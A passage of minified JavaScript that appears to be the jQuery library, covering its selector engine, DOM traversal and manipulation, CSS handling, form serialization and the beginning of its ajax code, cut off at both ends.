if(t=e[4])q.test(t)&&(n=ut(t,!0))&&(n=t.indexOf(")",t.length-n)-t.length)&&(t=t.slice(0,n),e[0]=e[0].slice(0,n)),e[2]=t;return e.slice(0,3)}},filter:{ID:r?function(e){return e=e.replace($,""),function(t){return t.getAttribute("id")===e}}:function(e){return e=e.replace($,""),function(t){var n=typeof t.getAttributeNode!==p&&t.getAttributeNode("id");return n&&n.value===e}},TAG:function(e){return e==="*"?function(){return!0}:(e=e.replace($,"").toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=k[d][e+" "];return t||(t=new RegExp("(^|"+O+")"+e+"("+O+"|$)"))&&k(e,function(e){return t.test(e.className||typeof e.getAttribute!==p&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r,i){var s=nt.attr(r,e);return s==null?t==="!=":t?(s+="",t==="="?s===n:t==="!="?s!==n:t==="^="?n&&s.indexOf(n)===0:t==="*="?n&&s.indexOf(n)>-1:t==="$="?n&&s.substr(s.length-n.length)===n:t==="~="?(" "+s+" ").indexOf(n)>-1:t==="|="?s===n||s.substr(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r){return e==="nth"?function(e){var t,i,s=e.parentNode;if(n===1&&r===0)return!0;if(s){i=0;for(t=s.firstChild;t;t=t.nextSibling)if(t.nodeType===1){i++;if(e===t)break}}return i-=r,i===n||i%n===0&&i/n>=0}:function(t){var n=t;switch(e){case"only":case"first":while(n=n.previousSibling)if(n.nodeType===1)return!1;if(e==="first")return!0;n=t;case"last":while(n=n.nextSibling)if(n.nodeType===1)return!1;return!0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||nt.error("unsupported pseudo: "+e);return r[d]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?N(function(e,n){var i,s=r(e,t),o=s.length;while(o--)i=T.call(e,s[o]),e[i]=!(n[i]=s[o])}):function(e){return r(e,0,n)}):r}},pseudos:{not:N(function(e){var t=[],n=[],r=a(e.replace(j,"$1"));return r[d]?N(function(e,t,n,i){var s,o=r(e,null,i,[]),u=e.length;while(u--)if(s=o[u])e[u]=!(t[u]=s)}):function(e,i,s){return t[0]=e,r(t,null,s,n),!n.pop()}}),has:N(function(e){return function(t){return nt(e,t).length>0}}),contains:N(function(e){return function(t){return(t.textContent||t.innerText||s(t)).indexOf(e)>-1}}),enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&!!e.checked||t==="option"&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},parent:function(e){return!i.pseudos.empty(e)},empty:function(e){var t;e=e.firstChild;while(e){if(e.nodeName>"@"||(t=e.nodeType)===3||t===4)return!1;e=e.nextSibling}return!0},header:function(e){return X.test(e.nodeName)},text:function(e){var t,n;return e.nodeName.toLowerCase()==="input"&&(t=e.type)==="text"&&((n=e.getAttribute("type"))==null||n.toLowerCase()===t)},radio:rt("radio"),checkbox:rt("checkbox"),file:rt("file"),password:rt("password"),image:rt("image"),submit:it("submit"),reset:it("reset"),button:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&e.type==="button"||t==="button"},input:function(e){return V.test(e.nodeName)},focus:function(e){var t=e.ownerDocument;return e===t.activeElement&&(!t.hasFocus||t.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},active:function(e){return e===e.ownerDocument.activeElement},first:st(function(){return[0]}),last:st(function(e,t){return[t-1]}),eq:st(function(e,t,n){return[n<0?n+t:n]}),even:st(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:st(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:st(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:st(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}},f=y.compareDocumentPosition?function(e,t){return e===t?(l=!0,0):(!e.compareDocumentPosition||!t.compareDocumentPosition?e.compareDocumentPosition:e.compareDocumentPosition(t)&4)?-1:1}:function(e,t){if(e===t)return l=!0,0;if(e.sourceIndex&&t.sourceIndex)return e.sourceIndex-t.sourceIndex;var n,r,i=[],s=[],o=e.parentNode,u=t.parentNode,a=o;if(o===u)return ot(e,t);if(!o)return-1;if(!u)return 1;while(a)i.unshift(a),a=a.parentNode;a=u;while(a)s.unshift(a),a=a.parentNode;n=i.length,r=s.length;for(var f=0;f<n&&f<r;f++)if(i[f]!==s[f])return ot(i[f],s[f]);return f===n?ot(e,s[f],-1):ot(i[f],t,1)},[0,0].sort(f),h=!l,nt.uniqueSort=function(e){var t,n=[],r=1,i=0;l=h,e.sort(f);if(l){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e},nt.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},a=nt.compile=function(e,t){var n,r=[],i=[],s=A[d][e+" "];if(!s){t||(t=ut(e)),n=t.length;while(n--)s=ht(t[n]),s[d]?r.push(s):i.push(s);s=A(e,pt(i,r))}return s},g.querySelectorAll&&function(){var e,t=vt,n=/'|\\/g,r=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,i=[":focus"],s=[":active"],u=y.matchesSelector||y.mozMatchesSelector||y.webkitMatchesSelector||y.oMatchesSelector||y.msMatchesSelector;K(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||i.push("\\["+O+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||i.push(":checked")}),K(function(e){e.innerHTML="<p test=''></p>",e.querySelectorAll("[test^='']").length&&i.push("[*^$]="+O+"*(?:\"\"|'')"),e.innerHTML="<input type='hidden'/>",e.querySelectorAll(":enabled").length||i.push(":enabled",":disabled")}),i=new RegExp(i.join("|")),vt=function(e,r,s,o,u){if(!o&&!u&&!i.test(e)){var a,f,l=!0,c=d,h=r,p=r.nodeType===9&&e;if(r.nodeType===1&&r.nodeName.toLowerCase()!=="object"){a=ut(e),(l=r.getAttribute("id"))?c=l.replace(n,"\\$&"):r.setAttribute("id",c),c="[id='"+c+"'] ",f=a.length;while(f--)a[f]=c+a[f].join("");h=z.test(e)&&r.parentNode||r,p=a.join(",")}if(p)try{return S.apply(s,x.call(h.querySelectorAll(p),0)),s}catch(v){}finally{l||r.removeAttribute("id")}}return t(e,r,s,o,u)},u&&(K(function(t){e=u.call(t,"div");try{u.call(t,"[test!='']:sizzle"),s.push("!=",H)}catch(n){}}),s=new RegExp(s.join("|")),nt.matchesSelector=function(t,n){n=n.replace(r,"='$1']");if(!o(t)&&!s.test(n)&&!i.test(n))try{var a=u.call(t,n);if(a||e||t.document&&t.document.nodeType!==11)return a}catch(f){}return nt(n,null,null,[t]).length>0})}(),i.pseudos.nth=i.pseudos.eq,i.filters=mt.prototype=i.pseudos,i.setFilters=new mt,nt.attr=v.attr,v.find=nt,v.expr=nt.selectors,v.expr[":"]=v.expr.pseudos,v.unique=nt.uniqueSort,v.text=nt.getText,v.isXMLDoc=nt.isXML,v.contains=nt.contains}(e);var nt=/Until$/,rt=/^(?:parents|prev(?:Until|All))/,it=/^.[^:#\[\.,]*$/,st=v.expr.match.needsContext,ot={children:!0,contents:!0,next:!0,prev:!0};v.fn.extend({find:function(e){var t,n,r,i,s,o,u=this;if(typeof e!="string")return v(e).filter(function(){for(t=0,n=u.length;t<n;t++)if(v.contains(u[t],this))return!0});o=this.pushStack("","find",e);for(t=0,n=this.length;t<n;t++){r=o.length,v.find(e,this[t],o);if(t>0)for(i=r;i<o.length;i++)for(s=0;s<r;s++)if(o[s]===o[i]){o.splice(i--,1);break}}return o},has:function(e){var t,n=v(e,this),r=n.length;return this.filter(function(){for(t=0;t<r;t++)if(v.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e,!1),"not",e)},filter:function(e){return this.pushStack(ft(this,e,!0),"filter",e)},is:function(e){return!!e&&(typeof e=="string"?st.test(e)?v(e,this.context).index(this[0])>=0:v.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,s=[],o=st.test(e)||typeof e!="string"?v(e,t||this.context):0;for(;r<i;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&n.nodeType!==11){if(o?o.index(n)>-1:v.find.matchesSelector(n,e)){s.push(n);break}n=n.parentNode}}return s=s.length>1?v.unique(s):s,this.pushStack(s,"closest",e)},index:function(e){return e?typeof e=="string"?v.inArray(this[0],v(e)):v.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.prevAll().length:-1},add:function(e,t){var n=typeof e=="string"?v(e,t):v.makeArray(e&&e.nodeType?[e]:e),r=v.merge(this.get(),n);return this.pushStack(ut(n[0])||ut(r[0])?r:v.unique(r))},addBack:function(e){return this.add(e==null?this.prevObject:this.prevObject.filter(e))}}),v.fn.andSelf=v.fn.addBack,v.each({parent:function(e){var t=e.parentNode;return t&&t.nodeType!==11?t:null},parents:function(e){return v.dir(e,"parentNode")},parentsUntil:function(e,t,n){return v.dir(e,"parentNode",n)},next:function(e){return at(e,"nextSibling")},prev:function(e){return at(e,"previousSibling")},nextAll:function(e){return v.dir(e,"nextSibling")},prevAll:function(e){return v.dir(e,"previousSibling")},nextUntil:function(e,t,n){return v.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return v.dir(e,"previousSibling",n)},siblings:function(e){return v.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return v.sibling(e.firstChild)},contents:function(e){return v.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:v.merge([],e.childNodes)}},function(e,t){v.fn[e]=function(n,r){var i=v.map(this,t,n);return nt.test(e)||(r=n),r&&typeof r=="string"&&(i=v.filter(r,i)),i=this.length>1&&!ot[e]?v.unique(i):i,this.length>1&&rt.test(e)&&(i=i.reverse()),this.pushStack(i,e,l.call(arguments).join(","))}}),v.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),t.length===1?v.find.matchesSelector(t[0],e)?[t[0]]:[]:v.find.matches(e,t)},dir:function(e,n,r){var i=[],s=e[n];while(s&&s.nodeType!==9&&(r===t||s.nodeType!==1||!v(s).is(r)))s.nodeType===1&&i.push(s),s=s[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)e.nodeType===1&&e!==t&&n.push(e);return n}});var ct="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",ht=/ jQuery\d+="(?:null|\d+)"/g,pt=/^\s+/,dt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,vt=/<([\w:]+)/,mt=/<tbody/i,gt=/<|&#?\w+;/,yt=/<(?:script|style|link)/i,bt=/<(?:script|object|embed|option|style)/i,wt=new RegExp("<(?:"+ct+")[\\s/>]","i"),Et=/^(?:checkbox|radio)$/,St=/checked\s*(?:[^=]|=\s*.checked.)/i,xt=/\/(java|ecma)script/i,Tt=/^\s*<!(?:\[CDATA\[|\-\-)|[\]\-]{2}>\s*$/g,Nt={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},Ct=lt(i),kt=Ct.appendChild(i.createElement("div"));Nt.optgroup=Nt.option,Nt.tbody=Nt.tfoot=Nt.colgroup=Nt.caption=Nt.thead,Nt.th=Nt.td,v.support.htmlSerialize||(Nt._default=[1,"X<div>","</div>"]),v.fn.extend({text:function(e){return v.access(this,function(e){return e===t?v.text(this):this.empty().append((this[0]&&this[0].ownerDocument||i).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(v.isFunction(e))return this.each(function(t){v(this).wrapAll(e.call(this,t))});if(this[0]){var t=v(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&e.firstChild.nodeType===1)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return v.isFunction(e)?this.each(function(t){v(this).wrapInner(e.call(this,t))}):this.each(function(){var t=v(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=v.isFunction(e);return this.each(function(n){v(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){v.nodeName(this,"body")||v(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.insertBefore(e,this.firstChild)})},before:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(e,this),"before",this.selector)}},after:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this.nextSibling)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(this,e),"after",this.selector)}},remove:function(e,t){var n,r=0;for(;(n=this[r])!=null;r++)if(!e||v.filter(e,[n]).length)!t&&n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),v.cleanData([n])),n.parentNode&&n.parentNode.removeChild(n);return this},empty:function(){var e,t=0;for(;(e=this[t])!=null;t++){e.nodeType===1&&v.cleanData(e.getElementsByTagName("*"));while(e.firstChild)e.removeChild(e.firstChild)}return this},clone:function(e,t){return e=e==null?!1:e,t=t==null?e:t,this.map(function(){return v.clone(this,e,t)})},html:function(e){return v.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return n.nodeType===1?n.innerHTML.replace(ht,""):t;if(typeof e=="string"&&!yt.test(e)&&(v.support.htmlSerialize||!wt.test(e))&&(v.support.leadingWhitespace||!pt.test(e))&&!Nt[(vt.exec(e)||["",""])[1].toLowerCase()]){e=e.replace(dt,"<$1></$2>");try{for(;r<i;r++)n=this[r]||{},n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),n.innerHTML=e);n=0}catch(s){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){return ut(this[0])?this.length?this.pushStack(v(v.isFunction(e)?e():e),"replaceWith",e):this:v.isFunction(e)?this.each(function(t){var n=v(this),r=n.html();n.replaceWith(e.call(this,t,r))}):(typeof e!="string"&&(e=v(e).detach()),this.each(function(){var t=this.nextSibling,n=this.parentNode;v(this).remove(),t?v(t).before(e):v(n).append(e)}))},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=[].concat.apply([],e);var i,s,o,u,a=0,f=e[0],l=[],c=this.length;if(!v.support.checkClone&&c>1&&typeof f=="string"&&St.test(f))return this.each(function(){v(this).domManip(e,n,r)});if(v.isFunction(f))return this.each(function(i){var s=v(this);e[0]=f.call(this,i,n?s.html():t),s.domManip(e,n,r)});if(this[0]){i=v.buildFragment(e,this,l),o=i.fragment,s=o.firstChild,o.childNodes.length===1&&(o=s);if(s){n=n&&v.nodeName(s,"tr");for(u=i.cacheable||c-1;a<c;a++)r.call(n&&v.nodeName(this[a],"table")?Lt(this[a],"tbody"):this[a],a===u?o:v.clone(o,!0,!0))}o=s=null,l.length&&v.each(l,function(e,t){t.src?v.ajax?v.ajax({url:t.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):v.error("no ajax"):v.globalEval((t.text||t.textContent||t.innerHTML||"").replace(Tt,"")),t.parentNode&&t.parentNode.removeChild(t)})}return this}}),v.buildFragment=function(e,n,r){var s,o,u,a=e[0];return n=n||i,n=!n.nodeType&&n[0]||n,n=n.ownerDocument||n,e.length===1&&typeof a=="string"&&a.length<512&&n===i&&a.charAt(0)==="<"&&!bt.test(a)&&(v.support.checkClone||!St.test(a))&&(v.support.html5Clone||!wt.test(a))&&(o=!0,s=v.fragments[a],u=s!==t),s||(s=n.createDocumentFragment(),v.clean(e,n,s,r),o&&(v.fragments[a]=u&&s)),{fragment:s,cacheable:o}},v.fragments={},v.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){v.fn[e]=function(n){var r,i=0,s=[],o=v(n),u=o.length,a=this.length===1&&this[0].parentNode;if((a==null||a&&a.nodeType===11&&a.childNodes.length===1)&&u===1)return o[t](this[0]),this;for(;i<u;i++)r=(i>0?this.clone(!0):this).get(),v(o[i])[t](r),s=s.concat(r);return this.pushStack(s,e,o.selector)}}),v.extend({clone:function(e,t,n){var r,i,s,o;v.support.html5Clone||v.isXMLDoc(e)||!wt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(kt.innerHTML=e.outerHTML,kt.removeChild(o=kt.firstChild));if((!v.support.noCloneEvent||!v.support.noCloneChecked)&&(e.nodeType===1||e.nodeType===11)&&!v.isXMLDoc(e)){Ot(e,o),r=Mt(e),i=Mt(o);for(s=0;r[s];++s)i[s]&&Ot(r[s],i[s])}if(t){At(e,o);if(n){r=Mt(e),i=Mt(o);for(s=0;r[s];++s)At(r[s],i[s])}}return r=i=null,o},clean:function(e,t,n,r){var s,o,u,a,f,l,c,h,p,d,m,g,y=t===i&&Ct,b=[];if(!t||typeof t.createDocumentFragment=="undefined")t=i;for(s=0;(u=e[s])!=null;s++){typeof u=="number"&&(u+="");if(!u)continue;if(typeof u=="string")if(!gt.test(u))u=t.createTextNode(u);else{y=y||lt(t),c=t.createElement("div"),y.appendChild(c),u=u.replace(dt,"<$1></$2>"),a=(vt.exec(u)||["",""])[1].toLowerCase(),f=Nt[a]||Nt._default,l=f[0],c.innerHTML=f[1]+u+f[2];while(l--)c=c.lastChild;if(!v.support.tbody){h=mt.test(u),p=a==="table"&&!h?c.firstChild&&c.firstChild.childNodes:f[1]==="<table>"&&!h?c.childNodes:[];for(o=p.length-1;o>=0;--o)v.nodeName(p[o],"tbody")&&!p[o].childNodes.length&&p[o].parentNode.removeChild(p[o])}!v.support.leadingWhitespace&&pt.test(u)&&c.insertBefore(t.createTextNode(pt.exec(u)[0]),c.firstChild),u=c.childNodes,c.parentNode.removeChild(c)}u.nodeType?b.push(u):v.merge(b,u)}c&&(u=c=y=null);if(!v.support.appendChecked)for(s=0;(u=b[s])!=null;s++)v.nodeName(u,"input")?_t(u):typeof u.getElementsByTagName!="undefined"&&v.grep(u.getElementsByTagName("input"),_t);if(n){m=function(e){if(!e.type||xt.test(e.type))return r?r.push(e.parentNode?e.parentNode.removeChild(e):e):n.appendChild(e)};for(s=0;(u=b[s])!=null;s++)if(!v.nodeName(u,"script")||!m(u))n.appendChild(u),typeof u.getElementsByTagName!="undefined"&&(g=v.grep(v.merge([],u.getElementsByTagName("script")),m),b.splice.apply(b,[s+1,0].concat(g)),s+=g.length)}return b},cleanData:function(e,t){var n,r,i,s,o=0,u=v.expando,a=v.cache,f=v.support.deleteExpando,l=v.event.special;for(;(i=e[o])!=null;o++)if(t||v.acceptData(i)){r=i[u],n=r&&a[r];if(n){if(n.events)for(s in n.events)l[s]?v.event.remove(i,s):v.removeEvent(i,s,n.handle);a[r]&&(delete a[r],f?delete i[u]:i.removeAttribute?i.removeAttribute(u):i[u]=null,v.deletedIds.push(r))}}}}),function(){var e,t;v.uaMatch=function(e){e=e.toLowerCase();var t=/(chrome)[ \/]([\w.]+)/.exec(e)||/(webkit)[ \/]([\w.]+)/.exec(e)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(e)||/(msie) ([\w.]+)/.exec(e)||e.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(e)||[];return{browser:t[1]||"",version:t[2]||"0"}},e=v.uaMatch(o.userAgent),t={},e.browser&&(t[e.browser]=!0,t.version=e.version),t.chrome?t.webkit=!0:t.webkit&&(t.safari=!0),v.browser=t,v.sub=function(){function e(t,n){return new e.fn.init(t,n)}v.extend(!0,e,this),e.superclass=this,e.fn=e.prototype=this(),e.fn.constructor=e,e.sub=this.sub,e.fn.init=function(r,i){return i&&i instanceof v&&!(i instanceof e)&&(i=e(i)),v.fn.init.call(this,r,i,t)},e.fn.init.prototype=e.fn;var t=e(i);return e}}();var Dt,Pt,Ht,Bt=/alpha\([^)]*\)/i,jt=/opacity=([^)]*)/,Ft=/^(top|right|bottom|left)$/,It=/^(none|table(?!-c[ea]).+)/,qt=/^margin/,Rt=new RegExp("^("+m+")(.*)$","i"),Ut=new RegExp("^("+m+")(?!px)[a-z%]+$","i"),zt=new RegExp("^([-+])=("+m+")","i"),Wt={BODY:"block"},Xt={position:"absolute",visibility:"hidden",display:"block"},Vt={letterSpacing:0,fontWeight:400},$t=["Top","Right","Bottom","Left"],Jt=["Webkit","O","Moz","ms"],Kt=v.fn.toggle;v.fn.extend({css:function(e,n){return v.access(this,function(e,n,r){return r!==t?v.style(e,n,r):v.css(e,n)},e,n,arguments.length>1)},show:function(){return Yt(this,!0)},hide:function(){return Yt(this)},toggle:function(e,t){var n=typeof e=="boolean";return v.isFunction(e)&&v.isFunction(t)?Kt.apply(this,arguments):this.each(function(){(n?e:Gt(this))?v(this).show():v(this).hide()})}}),v.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Dt(e,"opacity");return n===""?"1":n}}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":v.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(!e||e.nodeType===3||e.nodeType===8||!e.style)return;var s,o,u,a=v.camelCase(n),f=e.style;n=v.cssProps[a]||(v.cssProps[a]=Qt(f,a)),u=v.cssHooks[n]||v.cssHooks[a];if(r===t)return u&&"get"in u&&(s=u.get(e,!1,i))!==t?s:f[n];o=typeof r,o==="string"&&(s=zt.exec(r))&&(r=(s[1]+1)*s[2]+parseFloat(v.css(e,n)),o="number");if(r==null||o==="number"&&isNaN(r))return;o==="number"&&!v.cssNumber[a]&&(r+="px");if(!u||!("set"in u)||(r=u.set(e,r,i))!==t)try{f[n]=r}catch(l){}},css:function(e,n,r,i){var s,o,u,a=v.camelCase(n);return n=v.cssProps[a]||(v.cssProps[a]=Qt(e.style,a)),u=v.cssHooks[n]||v.cssHooks[a],u&&"get"in u&&(s=u.get(e,!0,i)),s===t&&(s=Dt(e,n)),s==="normal"&&n in Vt&&(s=Vt[n]),r||i!==t?(o=parseFloat(s),r||v.isNumeric(o)?o||0:s):s},swap:function(e,t,n){var r,i,s={};for(i in t)s[i]=e.style[i],e.style[i]=t[i];r=n.call(e);for(i in t)e.style[i]=s[i];return r}}),e.getComputedStyle?Dt=function(t,n){var r,i,s,o,u=e.getComputedStyle(t,null),a=t.style;return u&&(r=u.getPropertyValue(n)||u[n],r===""&&!v.contains(t.ownerDocument,t)&&(r=v.style(t,n)),Ut.test(r)&&qt.test(n)&&(i=a.width,s=a.minWidth,o=a.maxWidth,a.minWidth=a.maxWidth=a.width=r,r=u.width,a.width=i,a.minWidth=s,a.maxWidth=o)),r}:i.documentElement.currentStyle&&(Dt=function(e,t){var n,r,i=e.currentStyle&&e.currentStyle[t],s=e.style;return i==null&&s&&s[t]&&(i=s[t]),Ut.test(i)&&!Ft.test(t)&&(n=s.left,r=e.runtimeStyle&&e.runtimeStyle.left,r&&(e.runtimeStyle.left=e.currentStyle.left),s.left=t==="fontSize"?"1em":i,i=s.pixelLeft+"px",s.left=n,r&&(e.runtimeStyle.left=r)),i===""?"auto":i}),v.each(["height","width"],function(e,t){v.cssHooks[t]={get:function(e,n,r){if(n)return e.offsetWidth===0&&It.test(Dt(e,"display"))?v.swap(e,Xt,function(){return tn(e,t,r)}):tn(e,t,r)},set:function(e,n,r){return Zt(e,n,r?en(e,t,r,v.support.boxSizing&&v.css(e,"boxSizing")==="border-box"):0)}}}),v.support.opacity||(v.cssHooks.opacity={get:function(e,t){return jt.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=v.isNumeric(t)?"alpha(opacity="+t*100+")":"",s=r&&r.filter||n.filter||"";n.zoom=1;if(t>=1&&v.trim(s.replace(Bt,""))===""&&n.removeAttribute){n.removeAttribute("filter");if(r&&!r.filter)return}n.filter=Bt.test(s)?s.replace(Bt,i):s+" "+i}}),v(function(){v.support.reliableMarginRight||(v.cssHooks.marginRight={get:function(e,t){return v.swap(e,{display:"inline-block"},function(){if(t)return Dt(e,"marginRight")})}}),!v.support.pixelPosition&&v.fn.position&&v.each(["top","left"],function(e,t){v.cssHooks[t]={get:function(e,n){if(n){var r=Dt(e,t);return Ut.test(r)?v(e).position()[t]+"px":r}}}})}),v.expr&&v.expr.filters&&(v.expr.filters.hidden=function(e){return e.offsetWidth===0&&e.offsetHeight===0||!v.support.reliableHiddenOffsets&&(e.style&&e.style.display||Dt(e,"display"))==="none"},v.expr.filters.visible=function(e){return!v.expr.filters.hidden(e)}),v.each({margin:"",padding:"",border:"Width"},function(e,t){v.cssHooks[e+t]={expand:function(n){var r,i=typeof n=="string"?n.split(" "):[n],s={};for(r=0;r<4;r++)s[e+$t[r]+t]=i[r]||i[r-2]||i[0];return s}},qt.test(e)||(v.cssHooks[e+t].set=Zt)});var rn=/%20/g,sn=/\[\]$/,on=/\r?\n/g,un=/^(?:color|date|datetime|datetime-local|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,an=/^(?:select|textarea)/i;v.fn.extend({serialize:function(){return v.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?v.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||an.test(this.nodeName)||un.test(this.type))}).map(function(e,t){var n=v(this).val();return n==null?null:v.isArray(n)?v.map(n,function(e,n){return{name:t.name,value:e.replace(on,"\r\n")}}):{name:t.name,value:n.replace(on,"\r\n")}}).get()}}),v.param=function(e,n){var r,i=[],s=function(e,t){t=v.isFunction(t)?t():t==null?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};n===t&&(n=v.ajaxSettings&&v.ajaxSettings.traditional);if(v.isArray(e)||e.jquery&&!v.isPlainObject(e))v.each(e,function(){s(this.name,this.value)});else for(r in e)fn(r,e[r],n,s);return i.join("&").replace(rn,"+")};var ln,cn,hn=/#.*$/,pn=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,dn=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/,vn=/^(?:GET|HEAD)$/,mn=/^\/\//,gn=/\?/,yn=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bn=/([?&])_=[^&]*/,wn=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+)|)|)/,En=v.fn.load,Sn={},xn={},Tn=["*/"]+["*"];try{cn=s.href}catch(Nn){cn=i.createElement("a"),cn.href="",cn=cn.href}ln=wn.exec(cn.toLowerCase())||[],v.fn.load=function(e,n,r){if(typeof e!="string"&&En)return En.apply(this,arguments);if(!this.length)return this;var i,s,o,u=this,a=e.indexOf(" ");return a>=0&&(i=e.slice(a,e.length),e=e.slice(0,a)),v.isFunction(n)?(r=n,n=t):n&&typeof n=="object"&&(s="POST"),v.ajax({url:e,type:s,dataType:"html",data:n,complete:function(e,t){r&&u.each(r,o||[e.responseText,t,e])}}).done(function(e){o=arguments,u.html(i?v("<div>").append(e.replace(yn,"")).find(i):e)}),this},v.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(e,t){v.fn[t]=function(e){return this.on(t,e)}}),v.each(["get","post"],function(e,n){v[n]=function(e,r,i,s){return v.isFunction(r)&&(s=s||i,i=r,r=t),v.ajax({type:n,url:e,data:r,success:i,dataType:s})}}),v.extend({getScript:function(e,n){return v.get(e,t,n,"script")},getJSON:function(e,t,n){return v.get(e,t,n,"json")},ajaxSetup:function(e,t){return t?Ln(e,v.ajaxSettings):(t=e,e=v.ajaxSettings),Ln(e,t),e},ajaxSettings:{url:cn,isLocal:dn.test(ln[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded; charset=UTF-8",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":Tn},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":e.String,"text html":!0,"text json":v.parseJSON,"text xml":v.parseXML},flatOptions:{context:!0,url:!0}},ajaxPrefilter:Cn(Sn),ajaxTransport:Cn(xn),ajax:function(e,n){function T(e,n,s,a){var l,y,b,w,S,T=n;if(E===2)return;E=2,u&&clearTimeout(u),o=t,i=a||"",x.readyState=e>0?4:0,s&&(w=An(c,x,s));if(e>=200&&e<300||e===304)c.ifModified&&(S=x.getResponseHeader("Last-Modified"),S&&(v.lastModified[r]=S),S=x.getResponseHeader("Etag"),S&&(v.etag[r]=S)),e===304?(T="notmodified",l=!0):(l=On(c,w),T=l.state,y=l.data,b=l.error,l=!b);else{b=T;if(!T||e)T="error",e<0&&(e=0)}x.status=e,x.statusText=(n||T)+"",l?d.resolveWith(h,[y,T,x]):d.rejectWith(h,[x,T,b]),x.statusCode(g),g=t,f&&p.trigger("ajax"+(l?"Success":"Error"),[x,c,l?y:b]),m.fireWith(h,[x,T]),f&&(p.trigger("ajaxComplete",[x,c]),--v.active||v.event.trigger("ajaxStop"))}typeof 